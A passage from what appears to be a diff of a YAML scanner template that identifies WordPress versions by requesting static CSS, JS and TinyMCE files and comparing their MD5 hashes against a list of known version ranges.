"(\"b81c1479c74443d87373adb8f83ccb33\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.5 + dsl: + - "(\"d0fde0102413e2b4a5b7922569391ecb\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6319d1ae71068739dc713d26fd7da312\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"3f6ceb77ea8c1b75b748179215519ec5\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"40b2c5a72f36fa6375bdb67e26ea8b4d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b7d6f9102a09ce8f774d7cf359a70db3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2c8e94e3d93ccbf91a114e3bd34b0aca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7a3c939a198ba5e0ac4145a731f17127\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e9bdf549df031fe6b583e818dac7e4fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-layout.css" + matchers: + - type: dsl + name: 1.2-mingus - 1.2.2 + dsl: + - "(\"3eb56f763814712c192902a8c48b0c23\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"7140e06c00ed03d2bb3dad7672557510\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"1bcc9253506c067eb130c9fc4f211a2f\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"30bb4eebd20e27e399dbb8a5106d52e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"fd95127ba19547f5e4bd54307ea401e5\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"a8b2505542267a8315fb283bd5073dcc\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c403505339df2ef6bb916674e6bcb267\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"88e52fb011e57e6c3c8d95f8009531f3\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f741cc75faba09aa2f7e0b628e2b2b2a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global-rtl.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"e8cafb493fccd3a14877aecbabea22bb\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"a2741e62a5cc2bd28d8346c004eba7bd\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"c1d3b68a32d1c6dbed770377865764ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"61db67d7f5c655ce5176dc6204415e5d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"ffdc847cfa0a6dc1ee2df38a53c28bd2\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4ed3a64ed29775c1ad595f289a68736d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b720cd428c4af7aa2eb2544184cb166c\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"eceb5757d946022c22cbecf1b48643ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"1d28a5b5ee8474f5f07e9bf15a4cc49a\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"2b2e425ed02d774f5fc008f71b141d08\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"941cf7af3623be120885691b0a57ec07\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"49553c264b4bf194f17112e1e7f08a70\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ddfa3c98b711770b07844a19dc6a9bed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/blank.htm" + matchers: + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"5dbbcbc1f4bcbe5fe9f22905a7838b57\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e176e3f6f068f68640de4406478ea37b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"b8e395746dadd82553f7e05d94773218\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f5dd51facba3214e941d12247feae2d0\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"88783f6e539184616896268bca04c25e\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c071fad481334f6b06d4bb55bc76c2fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"430f5376bd650ad0d75e1787e7e75314\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"8a365e61385d019a68dded6919e9c0a3\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"9a959ab5f438970e3ff6b81b14e2351e\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"c5403fa2bb45c8eb102e4e958c5ab1fd\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c5a3ecbfc6a9f60214435ec893017a19\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"55577eddb6e3a2202771c05ed26119a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"809806c9cea0cd14d38a25340315c89c\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c44ed273034db1588c715a236235a24e\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"c0e587488b912245dbc1fe87fd58375d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eed157f75067e0523c72267c8a1718a9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"69ef93c7c6205b765fe37ea39dcb3c11\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a5c83eec566f3e926cb8b94f22097932\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"aa77cf5c3eb6ddabf49afe6742509b5b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a5ca39c7ff5b120c1f8b3030bfc72a66\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"f9755a2abfe8ebdf14ae665d4e64f25b\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"7b2de212dde19888dc191e7ba40c967e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3022f5720f96991c5279819e4ccd9db6\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"02de355bba3fdcecdd38a8ebe1a2d9d9\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"5317f5da30c076dac3987e5b56813920\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.dev.js" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"6cad1cbac77651c7e35bf55210e28d3e\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"d50cb86c0c59bddf298adc39d6a41f60\" == md5(body))" + - type: dsl + name: 3.3.1 - 3.3.3 + dsl: + - "(\"2ede6e863d4ef607c8e6af1cb77fec2b\" == md5(body))" + - type: dsl + name: 3.3 + dsl: + - "(\"15668f1c67a3fdb80cf021e231c085d8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"58213695ac22fbc3c2f6e159e2448b46\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"aeb8ffae99a8f3964c9c0ca140746afa\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"6fe3a82e70ceb1449146e3983fff91ac\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"60ad751677c87b314023944364431b13\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b3006945c3b8408f9c889b6aa6d28e44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"223fc3c5b7e5c2ae8abe9879ba07dda5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"549c843c51999ff7afb8ce4c4e36a253\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"70d51eecfd8d02a5f538c3be731fdedd\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"ff1fafac6a69b8ebced1965e18e39b4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"b7f14147f98e067f4c2df1cba298fd1a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"c2ba4c3bc967522600340dfdcbc43ba8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a56486988bfc38afea319ac5eef68319\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9a167e3d4423d210de6d92a7695a0ec3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"1ec85e4fa152f77e087102225304d588\" == md5(body))" + - type: dsl + name: 3.0.5 - 3.0.6 + dsl: + - "(\"580e3d6a8e88257b921a534c26560007\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.4 + dsl: + - "(\"73299ae2e6e8681b5eb9949706dcbb34\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"3c69319888144b5904c10ad64b999972\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"4758b37ba0588d0100bfad9ea7557bf9\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"392cf5bd0d18d352cf7e8178d5870be0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/link.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"73d4ffe078d60f5d63452e2c3e95182b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9953ab56d24df2c43e7591217d779dd3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"bdae891eeba96b0585eb0d978699e605\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4864f8eb687dabbff4cd9d8ecba8c712\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9406f7c7c89bbc67a698389c124e2bcd\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"f8cb995525a428d3df2a44799900f2f7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"86603ac86e519d4d65fe077fb4d8d0be\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9a7dca501ff7b62ada027341cd7a397b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6e15e3be35cdb751d367f1dc8be34cf1\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c151d8e1c8463b8589921ae9892952a7\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"60fb3a31220b50974228b898d13bfde4\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f4cbb390a6cc806a6f888009696800d5\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"45ca8fb38d196c8b814490a71fa2f85a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a271bba6f7c066798d2c114a56fb21ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"15f8ca03ff46bc3c16562a95209ae0bb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"16c6bfc29480dd1a2a3c6b51b114a265\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"39a1f5027797e7dd27e2d91d26238fde\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"81929c113470c66349b5086c6c7c9af0\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"2f921f2c07fa24953530b23bf2000e0a\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a4af9e6f7f306b7f4d39a7f59ca11df6\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"a47375f8211aceb57d7e67e04b491007\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"07708a7c49751ba1f9389079a56f2c91\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5274a3388475f362aba65bee56b7e411\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1b6df3b8b3edd3090ef2011ced0f9ac7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8e5284aa00887f6021be94410dce6ee3\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"4a0a94603795b7bfc41ff76ea8889db7\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c15313eca2138543d9f4e5b8407b496c\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"eb01e343c4903eb57aa0ab0afa7e20d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/about.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"742d8c3e934a99a6b55ddc1f9f0eb71d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"50218b28d236faa546d606dd90c2ed2f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"41d67913c326587ac7f2090fb74f5319\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"90787383a6434187195dd40aa95d237a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"11a6f93926ee36c97ee508c50fbb2e8d\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"ba3007568a4487475949ac2ace24604d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"7e80709c52260a0022f7f336b72cd71b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"6d3c5cbc4021ae8df64a1fe3e7040b11\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"883daf4c2686b667cdf5d0ee58368a47\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"04045286f214bd0e5f556f393301dd7e\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"2102cad8b48c2e05fa8ec2fd6be6c7e9\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"64c9568b29bc06652f9ece85691ecb1f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"f33f7fa8ff16f5ea67777719e51ea349\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2c9c1f6943a7b7a42b6e0aef5130f6db\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/anchor.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d39a84bbf89e1dbc300f44d4c6eff520\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0df79f28cd97ce273b7ee98f40deee20\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e013e73a9ff93156080ab087eb5cf69b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3f89e79d6c5aed7408b4132a520f5a66\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"702e8eda7a729cb67e6c8dd28adbaa01\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"7d6b77bd3ac2520fb484c7bac27922bb\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b84f177905e368a80d9a25e728182794\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e44a7c747828cc6698fc07842f1f2d1b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"f427c67e07e8f6a7df8c8af1961daec6\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f8e8fc869fa2768176d5c458eece8c4a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"fd990e3a5b37af121d77d30b75fc8f2b\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fcdc4522e42d5e4eb46a43ba771a16c0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2d6479966b6e403561858a3aa2404a33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/source_editor.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"f7dcaeb5cc281bdecf6330ca986fa439\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"abc891ffe0a1920e7dda4845e1ed5973\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ead9f98478f78b005bc67cd2a49613b3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8e0c1bef01e1a98388d141c53a05848b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"6268293d96f5baa48db1f2a54b657d76\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"541099ed16670e5299df3e6ecf61e7fa\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4b5f5a3e7846a30fe9dcb878f9e8f2cb\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7dca75fdff97de1cc2702c1782952605\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"c190bbe830b5985cb2c264ab8fae46b5\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"4728edfe58fc5b781c4fc2e1f90e0bb2\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f02303f69ff29bcd11411b40ac2147e7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"b5848d93559f1f58ca28eb10a63df54d\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"1b6d02c486a9c4c1e47b9cda373e18a9\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"6c74ba36d1e5d571adcf8247f5e29ab4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/color_picker.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"7fccf0616c87a689f089433a68141979\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f3105897d46f25ee0de51b86d702757a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af19a270b1d81e1f110849c67b9943b8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6ed9c179e0db33ec6731caee24ed7aed\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"739e889aa58742bdb4931babc80316f0\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"289f30cdd11f8a23c6458f1319323791\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a7a73c580a302db16002989c84c5bf4c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"20d0972f30e29d1518a657e90074020a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2c161f4ab885f01643bad16fba20661b\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"5a20037a144e58522a11fdd71352ae08\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"01474b7f41da7d851c5a7f27aa2f2ff0\" == md5(body))" + - type: dsl + name: 2.2.1 - 2.3.3 + dsl: + - "(\"d3e7f564e4bea2af433d6f7f882370ab\" == md5(body))" + - type: dsl + name: 2.1 - 2.2 + dsl: + - "(\"e5641589c55d58143a5a14e5332428c0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"742c7e852f2d121b5be88781ff0b93f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a2b3085f0ab3c323dd28187b739139ec\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f2b1d655935e99315b93c540c6035c48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fd2835b5c1610d37e4f546cd45bdbbda\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"53051500ea1cae4d71a092378ae1726b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"de50f43e740d9bcbb0bb5e5f31b0c45a\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e4f47b78c98d99433c91ec4a145f7ff5\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"f063bd5bed9288e08acd8c6364f6679d\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6b1b4ae45fe39b7b444d0dac8bbeb400\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"0b6cb9758b31dc49a1e6051dc67f56fa\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"dbe88526b02537b5670af1ae17b297df\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"caa70b329a15b7d276880d62a5d3b5cf\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"67c40f06846a456511d8688419451c18\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"fd5269ae542aca16ad8281ac551a576c\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"cc473d433ad83e107f8b417f8e07eb38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/image.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"7a6c90019843b98b685e2822412b6bcb\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"51398bf0a698cf6c3e3d4b76974804f8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b56263cc02fff500f707f51a797200ca\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c4e555a4eb2d92b12cc274299893f5fb\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a17cd268c9d523bf70ecf19757b93e22\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"549603c2a4def6160db28176cd7d7bc4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"08e69d593392dd50963dcb346ca0071c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0d385db27642478443914ec2178e195c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"019909ddbc8340e59cd64f4cdae21a6e\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"9c4fabe49f0526f70a897c86a49c7b1a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"b9f13e7b518cdf55a2617f44aa6426fa\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"cd1355d6758f2d58982afda2c4b917fe\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"6ee929f893a3cf67861b023f905baadd\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"390092c8f6af60b9a9d78fbdaf97d72a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/image.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"8d2c4871c2b431d003267d1ecebfecde\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"57b35a2d982e16ac9aac069345ec2300\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"27769fa50375e33e24e75cd356c085f4\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"10491e5ab4b2b507f18e0be5db37fbb7\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"fd4ba60e7499e1e06d8efc5841073a44\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"a8dd2a6733f5937952e90c7e80421905\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"088245408531c58bb52cc092294cc384\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"862f066cad8e2a478c43814f338fdd8c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/charmap.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e78d30352be54ce072b327c3f3ae5a1e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b2e2867e42e971a960e22d7fc355ba18\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"54f0b3a52f3bdecfae2fdaf9fa93a27c\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"119ead6c5c35d15999f47fa1ea8ea002\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"15e312d22a33ce3cade0ca6dd0a2ff06\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"90449ecb50b0aa527586a7217c136009\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"cf2e5b2fec3c06f763bd176d87ed4d0e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e514a461b0948068811c317af82305f0\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"63f3245f9cefd08530d8035399242d82\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"cafb84f559d7de79277a5b96a0e45f4a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"b3f3e37cff43d90e2fec656b52f1b67a\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"813a9c698d9150d198f438a7928bfa29\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3de5b82cc08338afd1923941bdb0c86f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pastetext.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e8598b664a0f4578a88c7c34e46c029d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7e2ab5dcd71147801312f12d9ad99d53\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"765a36671dc31ddf23bda7193e646842\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a5844c99bd289dcaf5561ae0f8ff0fc9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2d9e18b42ea47992ba2aa790a58e25aa\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c49497ac4150a78c561f240ae16fc47b\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"892be984236242a11a6d4490a978d754\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b82c2ee67a44ac0915ba6693ab622a36\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - 